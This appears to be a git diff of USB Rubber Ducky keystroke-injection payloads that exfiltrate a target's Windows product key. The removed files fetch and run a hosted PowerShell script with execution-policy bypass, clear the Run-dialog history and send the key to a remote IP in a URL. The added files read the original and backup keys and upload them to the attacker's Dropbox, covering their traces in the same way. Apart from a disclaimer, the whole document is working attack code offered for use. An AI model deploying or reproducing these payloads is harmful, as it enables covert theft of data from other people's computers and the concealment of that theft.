|
||||
<a href="https://git.io/typing-svg">
|
||||
<img src="https://readme-typing-svg.herokuapp.com/?lines=Windows+Product+Duckey+🦆🔑">
|
||||
</a>
|
||||
</h1>
|
||||
|
||||
## Description
|
||||
|
||||
This payload exfiltrate the target's Windows product key to a remote server. *Only works on Windows 10,11.*
|
||||
|
||||
## Usage
|
||||
|
||||
### Setup
|
||||
|
||||
- Set up a website on your server or a computer in the same network as the target's computer. You can use Python to do this by running the following command:
|
||||
```
|
||||
python -m http.server 80
|
||||
```
|
||||
- Download the "payload.txt" and "script.ps1" files and modify them to include the IP address of your server.
|
||||
- Move the modified "script.ps1" file to the root directory of your website, so it is downloadable from this address:
|
||||
```
|
||||
http://<REMOTE_IP_ADDRESS>/script.ps1
|
||||
```
|
||||
|
||||
### Analysis
|
||||
|
||||
Once the payload is executed, you can find the target's IP address and Windows product key by checking your website logs.
|
||||
|
||||
|
||||
***Note**: This script is designed to send the results to a specific server, so you don't have to rely on any file sharing services. Additionally, you can easily adapt it to work with encrypted sites.*
|
||||
|
||||
---
|
||||
|
||||
*This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.*
|
|
@ -1,17 +0,0 @@
|
|||
REM Title: Windows Product Duckey
|
||||
REM Author: Who-Is-Julien
|
||||
REM Description: This payload exfiltrate the target's Windows product key to a remote server.
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
REM Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
|
||||
DEFINE REMOTE_IP_ADDRESS 192.168.1.10
|
||||
|
||||
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http://
|
||||
STRING REMOTE_IP_ADDRESS
|
||||
STRING /script.ps1; iex $pl
|
||||
DELAY 500
|
||||
ENTER
|
|
@ -1,4 +0,0 @@
|
|||
#Replace <REMOTE_IP_ADDRESS> with the actual IP address of the remote server hosting the script.
|
||||
|
||||
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-WebRequest -Uri "http://<REMOTE_IP_ADDRESS>?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null
|
|
@ -1,8 +0,0 @@
|
|||
#Replace <REMOTE_IP_ADDRESS> with the actual IP address of the remote server hosting the script.
|
||||
|
||||
|
||||
#Clear windows run dialog history
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
||||
|
||||
#Retrieve and send the computer's original product key to a remote server
|
||||
Invoke-WebRequest -Uri "http://<REMOTE_IP_ADDRESS>?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null
|
|
@ -0,0 +1,41 @@
|
|||
# Windows Product Key Grabber
|
||||
|
||||
<p>
|
||||
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Product-Key-Grabber/payload.txt">
|
||||
<img alt="VIEW ON: HAK5 PAYLOADSTUDIO" src="https://img.shields.io/badge/VIEW_ON-HAK5_PAYLOADSTUDIO-red?style=for-the-badge">
|
||||
</a>
|
||||
<a href="#">
|
||||
<img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
|
||||
</a>
|
||||
<a href="#">
|
||||
<img alt="VERSION: 1.0" src="https://img.shields.io/badge/VERSION-1.0-green?style=for-the-badge">
|
||||
</a>
|
||||
</p>
|
||||
|
||||
This payload sends you the target PC's Windows product key via Dropbox.
|
||||
|
||||
## Process
|
||||
|
||||
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
|
||||
2. Opens a Windows Run dialog box.
|
||||
3. Executes a hosted PowerShell script that performs the following actions:
|
||||
- Clears the history of the Windows Run menu.
|
||||
- Recovers Windows product key from target PC.
|
||||
- Sends the Windows product key of the target PC to a file in your Dropbox.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://codeberg.org/PlumpyTurkey/Ducky-Utilities/src/branch/main/PowerShell-Functions/Send-ToDropbox). Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
|
||||
|
||||
> [!WARNING]
|
||||
> If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
|
||||
|
||||
## Options
|
||||
|
||||
|Required extension options|Extension|Data type|Default value|Description|
|
||||
|-|-|-|-|-|
|
||||
|RHP_SCRIPT_URL|Run Hosted PowerShell|String|example.com|Your PowerShell script download link|
|
||||
|
||||
## Contributors
|
||||
|
||||
- [PlumpyTurkey](https://codeberg.org/PlumpyTurkey)
|
|
@ -0,0 +1,107 @@
|
|||
REM_BLOCK DOCUMENTATION
|
||||
Title: Windows Product Key Grabber
|
||||
Author: PlumpyTurkey
|
||||
Description: This payload sends you the target PC's Windows product key via Dropbox.
|
||||
Target: Windows 10, 11
|
||||
Version: 1.0
|
||||
Category: Exfiltration
|
||||
END_REM
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
EXTENSION WINDOWS_ONLY
|
||||
REM VERSION 1.0
|
||||
REM AUTHOR: Korben
|
||||
|
||||
DEFINE #FAILURE_LED TRUE
|
||||
DEFINE #FAILURE_LED_MODE LED_R
|
||||
DEFINE #FAILURE_ATTACKMODE ATTACKMODE OFF
|
||||
|
||||
IF (($_OS == WINDOWS) == FALSE) THEN
|
||||
IF_DEFINED_TRUE #FAILURE_LED
|
||||
#FAILURE_LED_MODE
|
||||
DELAY 500
|
||||
#FAILURE_LED_MODE
|
||||
DELAY 500
|
||||
#FAILURE_LED_MODE
|
||||
END_IF_DEFINED
|
||||
#FAILURE_ATTACKMODE
|
||||
STOP_PAYLOAD
|
||||
END_IF
|
||||
END_EXTENSION
|
||||
|
||||
EXTENSION RUN_HOSTED_POWERSHELL
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Title: Run Hosted PowerShell
|
||||
Author: PlumpyTurkey
|
||||
Description: This extension executes a hosted PowerShell script using the Windows Run dialog box.
|
||||
Target: Windows 10, 11
|
||||
Version: 1.0
|
||||
END_REM
|
||||
|
||||
REM Required options:
|
||||
DEFINE #RHP_SCRIPT_URL example.com
|
||||
|
||||
REM Advanced options:
|
||||
DEFINE #RHP_DELAY 2000
|
||||
DEFINE #RHP_ELEVATED_EXECUTION FALSE
|
||||
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
|
||||
|
||||
GUI r
|
||||
|
||||
DELAY #RHP_DELAY
|
||||
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
|
||||
|
||||
IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
|
||||
CTRL SHIFT ENTER
|
||||
DELAY #RHP_DELAY
|
||||
LEFT
|
||||
END_IF_DEFINED
|
||||
|
||||
ENTER
|
||||
|
||||
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
|
||||
ATTACKMODE OFF
|
||||
END_IF_DEFINED
|
||||
END_EXTENSION
|
|
@ -0,0 +1,47 @@
|
|||
$REFRESH_TOKEN = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
|
||||
$APP_KEY = "XXXXXXXXXXXXXXX"
|
||||
$APP_SECRET = "XXXXXXXXXXXXXXX"
|
||||
|
||||
function Send-ToDropbox {
|
||||
[CmdletBinding()]
|
||||
param(
|
||||
[Parameter(Mandatory = $true)]
|
||||
[string]$Content,
|
||||
[Parameter(Mandatory = $true)]
|
||||
[string]$RefreshToken,
|
||||
[Parameter(Mandatory = $true)]
|
||||
[string]$AppKey,
|
||||
[Parameter(Mandatory = $true)]
|
||||
[string]$AppSecret,
|
||||
[string]$OutputFolder = "Exfiltrated-content",
|
||||
[string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt"
|
||||
)
|
||||
|
||||
try {
|
||||
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
|
||||
"Authorization" = "Bearer $((
|
||||
Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
|
||||
"Content-Type" = "application/x-www-form-urlencoded"
|
||||
} -Body @{
|
||||
"grant_type" = "refresh_token";
|
||||
"refresh_token" = $RefreshToken;
|
||||
"client_id" = $AppKey;
|
||||
"client_secret" = $AppSecret
|
||||
}
|
||||
).access_token)";
|
||||
"Content-Type" = "application/octet-stream";
|
||||
"Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}"
|
||||
} -Body $Content | Out-Null
|
||||
}
|
||||
catch {
|
||||
Write-Host "An error occurred: $_"
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
||||
|
||||
$ProductKey = "Original Product Key: $((Get-WmiObject -Query 'select * from SoftwareLicensingService').OA3xOriginalProductKey | Out-String)`n"
|
||||
$ProductKey += "Backup Product Key: $((Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform').BackupProductKeyDefault | Out-String)"
|
||||
|
||||
Send-ToDropbox -Content $ProductKey -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET
|
Loading…
Reference in New Issue